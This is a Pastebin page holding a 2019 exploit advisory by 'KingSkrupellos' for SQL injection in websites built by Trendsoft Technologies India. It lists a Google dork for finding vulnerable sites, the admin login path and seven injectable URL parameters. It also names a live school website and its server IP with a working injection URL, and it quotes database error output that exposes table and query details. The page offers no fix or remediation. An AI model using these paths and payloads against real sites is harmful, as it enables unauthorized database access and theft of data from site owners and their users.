API tools faq
paste
KingSkrupellos

Trendsoft Technologies India SQL Injection

KingSkrupellos
Jan 8th, 2019
53
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.27 KB | None | 0 0
raw download clone embed print report
  1. ############################################################
  2.  
  3. # Exploit Title : Trendsoft Technologies India SQL Injection Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 08/01/2019
  7. # Vendor Homepage : trendsoft.info
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''Designed & Maintained by Trendsoft Technologies''
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. CXSecurity Exploit Reference Link :
  15. cxsecurity.com/issue/WLB-2019010050
  16.  
  17. ############################################################
  18.  
  19. # Admin Panel Login Path :
  20. ***********************
  21.  
  22. /admin/
  23.  
  24. # SQL Injection Exploit :
  25. *********************
  26.  
  27. /page_detail.php?sid=Njk=&pid=NTA=[SQL Injection]
  28.  
  29. /contact_us.php?sid=NQ==[SQL Injection]
  30.  
  31. /principal_message.php?sid=Mg==[SQL Injection]
  32.  
  33. /alumni_gallery.php?pid=MQ==[SQL Injection]
  34.  
  35. /kg_gallery.php?pid=MQ==[SQL Injection]
  36.  
  37. /video_gallery.php?pid=Ng==[SQL Injection]
  38.  
  39. /onlineapp/AdmFormfatima.php?id=[SQL Injection]
  40.  
  41. ############################################################
  42.  
  43. # Example Vulnerable Site =>
  44. **************************
  45.  
  46. Note => (103.92.235.205) => There are 7 domains hosted on this server.
  47.  
  48. [+] fatimaconventschool.com/page_detail.php?sid=Njk=&pid=NTA=1%27
  49.  
  50. [Proof of Concept ] => archive.fo/0S8I0
  51.  
  52. ############################################################
  53.  
  54. # SQL Database Error :
  55. *********************
  56.  
  57. cannot execute query select staticId,parentId,staticTitle,externalLink from
  58. tbl_fatima_static_pages where enable='Activate' and parentId=505 order by
  59. orderOfAppearance ascYou have an error in your SQL syntax; check the
  60. manual that corresponds to your MySQL server version for the right
  61. syntax to use near order by orderOfAppearance asc' at line 1
  62.  
  63. select * from adminsetup where class=
  64. You have an error in your SQL syntax; check the manual that
  65. corresponds to your MySQL server version for the right syntax to use near '' at line 1
  66.  
  67. ############################################################
  68.  
  69. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  70.  
  71. ############################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!